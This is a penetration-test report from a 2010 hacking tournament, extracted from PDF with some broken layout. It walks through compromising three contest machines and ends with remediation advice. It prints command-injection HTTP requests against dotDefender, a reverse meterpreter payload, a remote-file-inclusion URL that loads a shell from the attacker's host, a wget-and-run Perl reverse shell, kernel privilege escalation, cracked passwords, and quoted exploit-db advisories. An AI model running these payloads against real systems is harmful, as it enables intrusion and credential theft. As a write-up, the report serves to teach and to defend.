Woff Hsiyf Report Final
Woff Hsiyf Report Final
Woff Hsiyf Report Final
Page 1
1 Table Of Contents
1 2 Table Of Contents Introduction 2.1 2.2 2.3 3 Global Objectives Global Objective Summary Global Objective Summary Report 2 4 5 5 5 6 6 6 7 7 8 8 8 8 11 14 15 15 15 15 15 15 15 18 22 Page 2
External Network Assessment on n00b filter machine (Objective 1.1) 3.1 3.2 3.3 Information Gathering Attack Vector Recommendations Information Disclosure Weak Password Remote Command Execution Vulnerability
Internal Network Assessment on machine KILLTHEN00B (Objective 2.1) 4.1 4.2 4.3 4.4 Information Gathering Attack Vector Other Vulnerabilities Found Recommendations Information Disclosure Directory Traversal in the FTP service Weak Password Potentially Vulnerable SurgeMail services
Internal Network Assessment on machine GHOST (Objective 2.2) 5.1 5.2 5.3 Information Gathering Attack Vector Recommendations
5.3.1 5.3.2 5.3.3 5.3.4 6 Appendix 6.1 6.2 6.3 6.4 6.5 6.6
Information Disclosure Remote File Inclusion Vulnerability Dangerous Software Packages Local Privilege Escalation Vulnerability
22 22 23 23 23 23 24 25 26 27 27
Dotdefender Remote Command Execution 3.8-5 CompleteFTP Server Directory Traversal Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities Modified php shell source code Linux Kernel Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability Getting around "su : must be run from a terminal"
Page 3
2 Introduction
Offensive Security has announced the How Strong Is Your FU Public Hacking Tournament, which started on 8th May, 2010. The tournament had two phases, only the first 100 contestants who completed Phase 1 were allowed to proceed with Phase 2. The tournament had the following rules: Contestants were allowed to attack only the IPs listed below. Contestants were not allowed to launch DoS attack, ARP spoofing or deface the machines. Contestants were not allowed to launch disruptive attacks.
This report contains my findings gathered during the assessment. The assessment was done with the following knowledge of the infrastructure, systems and applications: The noob filter machines were available on IP address 67.23.72.4 (www1.noobfilter.com) and 67.23.72.5 (www2.noob-filter.com). FTP credentials: devil / killthen00b Internal VPN IPs 192.168.6.66/67/68 (all same) and 192.168.6.70/71/72 (all same) This report contains sub-sections. Each Sub-section discusses in detail all relevant issues or avenues used by attackers to compromise and to gain unauthorized access to sensitive information. Every issue includes recommendations, which, if followed correctly, will ensure the integrity of the systems/devices/applications.
Page 4
Page 5
After opening the http://www1.noob-filter.com/ URL a simple login page with a username and a password field was displayed. After an (unsuccessful) SQL injection attack an error message showed up.
The dotDefender applications site management page was password protected under the default dotDefender folder. The username for the HTTP Basic Authentication was displayed in the prompt message (admin), the password was easily guessable (password). The Authorization header was extracted from Paros Proxys logs and used to forge a Page 6
packet that exploits a remote command execution vulnerability (see Appendix 6.1) dotDefenders site management interface. The following forged package was sent by Paros Proxys manual request editing function to find the required n00bSecret.txt:
POST http://www1.noob-filter.com/dotDefender/index.cgi HTTP/1.1 Host: www1.noob-filter.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www1.noob-filter.com/dotDefender/index.cgi Authorization: Basic YWRtaW46cGFzc3dvcmQ= Content-Type: application/x-www-form-urlencoded Content-Length: 109 sitename=notexisting&deletesitename=notexisting;id;find / -name n00bSecret.txt;&action=deletesite&linenum=15
The
response
contained
the
location
of
the
required
file
(/opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt) after the <!-- webmin compat --> HTML comment. To view the contents of the file, the following request was sent:
POST http://www2.noob-filter.com/dotDefender/index.cgi HTTP/1.1 Host: www2.noob-filter.com User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3 Paros/3.2.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www2.noob-filter.com/dotDefender/ Authorization: Basic YWRtaW46cGFzc3dvcmQ= Content-Type: application/x-www-form-urlencoded Content-Length: 141 sitename=notexisting&deletesitename=notexisting;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;&action=deletesite&linenum=15
3.3 Recommendations
3.3.1 Information Disclosure The server disclosed information about the used IPS technology with dotDefenders default blocked your message page. It is recommended to configure dotDefender in such way, that it displays just the necessary information to the user.
Page 7
The site management of dotDefender was installed to a well known directory. It is recommended to install dotDefender to a not well known directory. The authentication popup contained a valid username. It is recommended to remove this information from the authentication message. 3.3.2 Weak Password The admin user had a trivial password. It is recommended to set more complex passwords for administrator accounts. 3.3.3 Remote Command Execution Vulnerability The installed version of the dotDefender application was outdated. It is recommended to update the installed software regularly.
Page 8
Discovered open port 106/tcp on 192.168.6.72 Discovered open port 366/tcp on 192.168.6.72 Discovered open port 7443/tcp on 192.168.6.72 Discovered open port 7025/tcp on 192.168.6.72 Completed SYN Stealth Scan at 18:24, 21.77s elapsed (1000 total ports) Initiating Service scan at 18:24 Scanning 14 services on 192.168.6.72 Completed Service scan at 18:24, 22.21s elapsed (14 services on 1 host) NSE: Script scanning 192.168.6.72. NSE: Script Scanning completed. Host 192.168.6.72 is up (0.18s latency). Scanned at 2010-05-08 18:24:01 CEST for 44s Interesting ports on 192.168.6.72: Not shown: 986 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp 25/tcp open smtp Surgemail smtpd 3.8k4-4 80/tcp open http DNews Web Based Manager 106/tcp open pop3pw Qualcomm poppassd (Maximum users connected) 110/tcp open pop3 SurgeMail pop3d 3.8k4-4 143/tcp open imap SurgeMail imapd 3.8k4-4 366/tcp open smtp Surgemail smtpd 3.8k4-4 465/tcp open ssl/smtp Surgemail smtpd 3.8k4-4 587/tcp open smtp Surgemail smtpd 3.8k4-4 993/tcp open ssl/imap SurgeMail imapd 3.8k4-4 995/tcp open tcpwrapped 3389/tcp open ms-term-serv? 7025/tcp open tcpwrapped 7443/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port21-TCP:V=5.00%I=7%D=5/8%Time=4BE59040%P=i686-pc-linux-gnu%r(NULL,31 SF:,"220-Complete\x20FTP\x20server\r\n220\x20FTP\x20Server\x20v\x203\.3\.0 SF:\r\n")%r(GenericLines,31,"220-Complete\x20FTP\x20server\r\n220\x20FTP\x SF:20Server\x20v\x203\.3\.0\r\n")%r(Help,54,"220-Complete\x20FTP\x20server SF:\r\n220\x20FTP\x20Server\x20v\x203\.3\.0\r\n502\x20Command\x20not\x20im SF:plemented:\x20HELP\r\n")%r(SMBProgNeg,31,"220-Complete\x20FTP\x20server SF:\r\n220\x20FTP\x20Server\x20v\x203\.3\.0\r\n"); MAC Address: 00:0C:29:B4:7D:53 (VMware) Service Info: Host: killthen00b Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.37 seconds Raw packets sent: 2987 (131.424KB) | Rcvd: 27 (1162B)
please
submit
the
following
fingerprint
at
Page 9
FTP credentials (devil/killthen00b) were given. Connecting to the machines 3398 port with rdesktop showed that the installed operating system is Windows 7. Using the provided username and password Windows denied the user to log on because it was not in the Remote Desktop Users group, which means devil is a valid local user with the above mentioned password.
Page 10
After connecting to the FTP server (using the provided username and password) a directory traversal vulnerability (see Appendix 6.2) was exploited to become able to move files between the server and the attacking machine not only in the FTP users home directory.
Page 11
In order to gain a shell on the machine a reverse_tcp meterpreter shell was uploaded to the cgi-bin directory (c:/surgemail/scripts/). The executable containing the reverse meterpreter shell was created with the following command:
root@woff-laptop:/pentest/exploit/msf3# ./msfpayload /home/woff/Documents/HSIYF/exploit/meterpreter_mine.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=192.168.6.112 windows/meterpreter/reverse_tcp LHOST=192.168.6.112 X >
Page 12
To handle the incoming connection the meterpreter listener was started from msfconsole. After opening the http://192.168.6.72/scripts/meterpreter_mine.exe URL with a browser the reverse meterpreter session opened:
Basic information about the machine and the level of the gained privilege was checked.
Page 13
With NT AUTHORITY\SYSTEM rights the proof.txt was extracted from the Administrator users Desktop.
Using John The Ripper user n00bs password was cracked in a reasonable time.
root@woff-laptop:/pentest/password/john/run# ./john n00b.txt Loaded 2 password hashes with 2 different salts (OpenLDAP SSHA [salted SHA-1]) pippo123 (n00b@killthen00b)
Page 14
Based on vulnerability reports available on the internet the installed version of SurgeMail might be vulnerable to some post authentication buffer overflow. These exploits could have been used with the above mentioned username and password to gain shell on the machine.
4.4 Recommendations
4.4.1 Information Disclosure The FTP server on port 21 gave back a valid banner. It is recommended to set a fake banner for the FTP service. 4.4.2 Directory Traversal in the FTP service The installed version of Complete FTP Server was vulnerable to a directory traversal attack. It is recommended to update the installed software regularly. 4.4.3 Weak Password The n00b user had a simple password. It is recommended to set more complex passwords. 4.4.4 Potentially Vulnerable SurgeMail services The installed version SurgeMail might be vulnerable to several exploits. It is recommended to update the installed software regularly.
Page 15
1 service unrecognized despite returning data. If you know the service/version, please submit http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port80-TCP:V=5.00%I=7%D=5/8%Time=4BE58D4D%P=i686-pc-linux-gnu%r(GetRequ SF:est,333,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2008\x20May\x202010\x SF:2001:06:08\x20GMT\r\nServer:\x20Microsoft-IIS\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\r\nContent-Type:\x20text/html\r\nCache-control:\x20private\r SF:\nVary:\x20Accept-Encoding\r\nContent-Length:\x20619\r\nConnection:\x20 SF:close\r\n\r\n<html>\n<head>\n<title>Let's\x20play\x20with\x20the\x20off SF:sec\x20team</title>\n</head>\n<body\x20style=\"color:\x20#FFFFFF;\x20ba SF:ckground-color:\x20#000000;font-family:\x20verdana;\">\n<center>\n<div\ SF:x20style=\"width:600px;height:399px;background-image:url\(offsec-team\. SF:jpg\);\">\n<form\x20method=\"post\"\x20action=\"login\.asp\">\n<table\x SF:20style=\"padding-top:170px;\">\n<tr>\n<td>Username:\x20</td><td><input SF:\x20type=\"text\"\x20name=\"username\"\x20value=\"\"></td>\n</tr>\n<tr> SF:\n<td>Password:\x20</td><td><input\x20type=\"password\"\x20name=\"passw SF:ord\"></td>\n</tr>\n<tr>\n<td\x20colspan=\"2\"\x20align=\"right\"><inpu SF:t\x20type=\"submit\"\x20name=\"submit\"\x20value=\"Enter\"></td>\n</tr> SF:\n</table>\n</form>\n</div>\n</center>\n</body>\n</html>\n")%r(HTTPOpti SF:ons,333,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2008\x20May\x202010\x SF:2001:06:09\x20GMT\r\nServer:\x20Microsoft-IIS\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\r\nContent-Type:\x20text/html\r\nCache-control:\x20private\r SF:\nVary:\x20Accept-Encoding\r\nContent-Length:\x20619\r\nConnection:\x20 SF:close\r\n\r\n<html>\n<head>\n<title>Let's\x20play\x20with\x20the\x20off SF:sec\x20team</title>\n</head>\n<body\x20style=\"color:\x20#FFFFFF;\x20ba SF:ckground-color:\x20#000000;font-family:\x20verdana;\">\n<center>\n<div\ SF:x20style=\"width:600px;height:399px;background-image:url\(offsec-team\. SF:jpg\);\">\n<form\x20method=\"post\"\x20action=\"login\.asp\">\n<table\x SF:20style=\"padding-top:170px;\">\n<tr>\n<td>Username:\x20</td><td><input SF:\x20type=\"text\"\x20name=\"username\"\x20value=\"\"></td>\n</tr>\n<tr> SF:\n<td>Password:\x20</td><td><input\x20type=\"password\"\x20name=\"passw SF:ord\"></td>\n</tr>\n<tr>\n<td\x20colspan=\"2\"\x20align=\"right\"><inpu SF:t\x20type=\"submit\"\x20name=\"submit\"\x20value=\"Enter\"></td>\n</tr> SF:\n</table>\n</form>\n</div>\n</center>\n</body>\n</html>\n"); MAC Address: 00:0C:29:91:42:FA (VMware) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 74.18 seconds
the
following
fingerprint
at
Page 16
+ OSVDB-7: GET /iissamples/exair/howitworks/Code.asp : Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193. + 3577 items checked: 4 item(s) reported on remote host + End Time: 2010-05-09 18:53:40 (1632 seconds) --------------------------------------------------------------------------+ 1 host(s) tested
Although the server responses indicated that the running web server is IIS and nikto found some IIS Frontpage related files, it was possible with http fingerprinting and analyzing the responses to determine that Apache2 was serving the http requests. HTTPrint gave the following results:
httprint v0.301 (beta) - web server fingerprinting tool (c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt http://net-square.com/httprint/ [email protected] Finger Printing on http://192.168.6.68:80/ Finger Printing Completed on http://192.168.6.68:80/ -------------------------------------------------Host: 192.168.6.68 Derived Signature: Microsoft-IIS 811C9DC56ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5 0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5 6ED3C2956ED3C2956ED3C295811C9DC5E2CE6927811C9DC56ED3C295811C9DC5 6ED3C2956ED3C2952A200B4C6ED3C2956ED3C2956ED3C2956ED3C295E2CE6923 E2CE69236ED3C295811C9DC5E2CE6927E2CE6923 Banner Reported: Microsoft-IIS Banner Deduced: Apache/2.0.x Score: 95 Confidence: 57.23
The login page on http://192.168.6.68/ was not vulnerable to sql injection and didnt give any error messages. Enumerating web directories manually gave back positive result when requesting /test.
Page 17
During the manual enumeration of web directories http://192.168.6.68/test/ was redirected by the server to http://192.168.6.68/test.asp.
Page 18
After deobfuscating the code (simple hex to ascii conversion on the array values) two images were identified (0.gif and 1.gif). Requesting /1.gif redirected to /1/1.jpeg, so http://192.168.6.68/1/ was opened in a browser to check for interesting files, but it gave back a login screen.
The parameter names used here were different than the ones in the main page. With Google the used parameter names were identified related to the open source Simple Text-File Login script, which was vulnerable to a remote file inclusion vulnerability (see Appendix 6.3). To exploit the vulnerability apache was started on the attacker machine and a modified php shell script (see Appendix 6.4) was uploaded for remote file inclusion.
Page 19
The following URL was opened on the target machine to run whoami command on the target:
http://192.168.6.68/1/slogin_lib.inc.php?slogin_path=http%3A%2F%2F192.168.6.112%2Fshll%2F&command=whoami&dir=%2Fvar%2Fwww
After looking through the accessible files and basic system information a PERL reverse shell (connecting to port 4567) was downloaded from the attacking machine (wget http://192.168.6.112/shll/rev.pl) and executed (perl rev.pl) with the PHP shell.
Figure 12 Execution of the uploaded PERL reverse shell using the PHP shell
Using the reverse PERL shell: The mounted drives were identified with mount The kernel version was identified with uname a A copy of the GNU C Compiler was found in /usr/bin (gcc-4.4)
Page 20
By the kernel version the system was affected by some vulnerability but most of the exploits were not accessible or not working. Checking the recent vulnerabilities found in Ubuntu on http://securityfocus.com/ lead to a EXT4 exploit (see Appendix 6.4). Since the filesystem of / was EXT4 the exploit was promising. The exploit was downloaded from the attacker machine to GHOST, the .c sources were compiled manually using /usr/bin/gcc-4.4. The shell script, that came with the exploit was not used, every command was given out manually. Since the attacked machine was running Ubuntu and the last step of the exploit was a su root command (which requires TTY) a python workaround (see Appendix 6.6) was used to get TTY in the reverse perl shell. With the elevated privileges the /root/proof.txt became accessible.
Page 21
Figure 14 Successfull privilege escalation attach after gaining TTY in the reverse PERL shell
5.3 Recommendations
5.3.1 Information Disclosure Test scripts were left on the machine, which are accessible on guessable URL-s. It is recommended to remove every test script from the machine. 5.3.2 Remote File Inclusion Vulnerability The installed version of SiTeFiLo is vulnerable to remote file inclusion. It is recommended to regularly upgrade the software on the machine. It is recommended to configure php.ini in such way, that it forbids the usage of some dangerous php functions (exec, shell_exec, escapeshellcmd) and only allows include from local sources (allow_url_include). Page 22
5.3.3 Dangerous Software Packages Gcc-4.4 is available on the server. It is recommended to remove the development software from the machine or allow the access to them only for high privileged users. 5.3.4 Local Privilege Escalation Vulnerability The system is not upgraded and contains exploitable vulnerability. It is recommended to upgrade the machine regularly.
6 Appendix
6.1 Dotdefender Remote Command Execution 3.8-5
Source: http://www.exploit-db.com/exploits/10261
# Title: Dotdefender Remote Command Execution 3.8-5 # EDB-ID: 10261 # CVE-ID: () # OSVDB-ID: () # Author: John Dos # Published: 2009-12-01 # Verified: yes # Download Exploit Code # Download N/A view sourceprint? Problem Description =================== A remote command execution dotDefender (3.8-5) Site Management. vulnerability exists in the A normal delete transaction looks as follow: POST /dotDefender/index.cgi HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; enUS; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://172.16.159.132/dotDefender/index.cgi Authorization: Basic YWRtaW46 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 76 sitename=dotdefeater&deletesitename=dotdefeater&action=delete site&linenum=14 An attack looks like: --------------------/Request/-------------------POST /dotDefender/index.cgi HTTP/1.1 Host: 172.16.159.132 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; enUS; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://172.16.159.132/dotDefender/index.cgi Authorization: Basic YWRtaW46
dotDefender [1] is a web appliaction firewall (WAF) which 'prevents hackers from attacking your website.' Technical Details ================= The Site Management application of dotDefender is reachable as a web application (https:site/dotDefender/) on the webserver. After passing the Basic Auth login you can create/delete applications. The mentioned vulnerability is in the 'deletesite' implementation and the 'deletesitename' variable. Insufficient input validation allows an attacker to inject arbitrary commands. Delete Site ===========
Page 23
Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 95 sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15 --------------------/Response/-------------------[...] uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin uid=33(www-data) gid=33(www-data) groups=33(www-data) total 12 drwxr-xr-x 3 root root 4096 Nov 23 02:37 . drwxr-xr-x 9 root root 4096 Nov 23 02:37 .. drwxr-xr-x 7 www-data 99 4096 Nov 23 07:11 admin /usr/local/APPCure-full/lib/admin [...]
313 $deletesitename=$postFields{"deletesitename"}; 314 $dots_index = index($deletesitename,"%3A"); 315 316 if($dots_index != -1 ) { 317 $site_a_part= substr($deletesitename,0,$dots_index); 318 $site_b_part= substr($deletesitename,$dots_index+3,length($deletesitename)$dots_index-2); 319 $site_a_part=&cleanIt($site_a_part); 320 $site_b_part=&cleanIt($site_b_part); 321 $deletesitename = $site_a_part.":".$site_b_part; 322 } 323 324 $linenum=$postFields{'linenum'}; 325 applyDbAudit($action); 326 &delline($linenum,2); 327 cleanSiteFingerPrints($deletesitename); 328 329 &deleteSiteConf($deletesitename); 330 $site_params="$CTMP_DIR/".$deletesitename."_params"; 331 system("rm -f $site_params"); And applicure-lib2.pl: 13 sub cleanIt { 14 my($param,$type)=@_; 15 16 $param =~ s/%([a-fA-F0-9]{2})/pack "H2", $1/eg; 17 if ($type eq 'any') { 18 } elsif ($type eq 'filter') { 19 $param =~ s/\+/" "/eg; 20 } elsif ($type eq 'path') { 21 $param = un_urlize($param); 22 #$param =~ s/([^A-Za-z0-9\-_.\/~'])//g; 23 #$param =~ s/\+/" "/eg; 24 } else { 25 $param =~ s/([^A-Za-z0-9\-_.~'])//g; 26 } 27 return $param; 28 } Here one can see that certain shell control characters are not protected by the call to cleanIt. Thus an attacker can gain control of the system call in line 331 of index1.cgi.
Affected Code ============= The affected code (perl) is in index1.cgi of the admin interface: 311 312 }elsif($action eq "deletesite") { # delete site
Page 24
6.3 Simple
Text-File
Login
script
1.0.6
(DD/RFI)
Multiple
Vulnerabilities
Source: http://www.exploit-db.com/exploits/7444
# Title: Simple Text-File Login script 1.0.6 (DD/RFI) Multiple Vulnerabilities # EDB-ID: 7444 # CVE-ID: (2008-5762) # OSVDB-ID: (50712) # Author: Osirys # Published: 2008-12-14 # Verified: yes # Download Exploit Code # Download N/A view sourceprint? [START] ##################################################### #################################### [0x01] Informations: Script : Simple Text-File Login script 1.0.6 Download : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type= 1 Vulnerability : Remote File Inclusion / Sensitive Data Disclosure Author : Osirys Contact : osirys[at]live[dot]it Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay Notes :* * The name of this login system is Simple Text-File Login script, so we can already understand that this script will use a .txt file to do his job. So it's like if the coder didn't think that a login system like this isn't vulnerable. Weird ! Anyway, it's vulnerable to Remote File Inclusion also, here we are ! ##################################################### #################################### [0x02] Bug:[Remote File Inclusion] ###### Bugged file is: /[path]/slogin_lib.inc.php [CODE] 90. if (!isset ($slogin_path)) { 91. $slogin_path = ""; 92. } [/CODE] If $slogin_path is not given, becomes a null variable. Scrolling down the source code, you can see an include of that variable everywhere. Just one of the few vulnerable includes: [CODE] include_once ($slogin_path . "header.inc.php"); [/CODE] FIX: Just declare $slogin_path. An example of a bugged inclusion in the source is this: [CODE] include_once ($slogin_path . "header.inc.php"); [/CODE] The header.inc.php file, such as all the files of this cms, is in the same dir of slogin_lib.inc.php, so a fix could be just to include the file, without including a variable, which should be null becouse all the files are in the same dir. [CODE] include_once ("header.inc.php"); # <-- This is a secure include. [/CODE] [!] EXPLOIT: /[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell] ##################################################### ################################### [0x03] Bug:[Sensitive Data Disclosure] ###### * As I already said, this is not a real bug, becouse is the intention of the author to use a .txt file as a login storage. But it's weird, it's unsecure ! Maybe he just sees the goodness of people (hehe xD) In this login system, sensible datas like username and password are stored in a local text file , so we can get sensitive information just going to this txt file . The name of this file is set in slogin_lib.inc.php. By default is: slog_users.txt [!] EXPLOIT: /[path]/slog_users.txt ##################################################### #################################### [/END] # milw0rm.com [2008-12-14]
Page 25
Page 26
6.5 Linux Kernel Ext4 'move extents' ioctl Local Privilege Escalation Vulnerability
Source: http://www.securityfocus.com/bid/37277/exploit
Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions. Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks. Successful exploits will result in the complete compromise of affected computers.
Page 27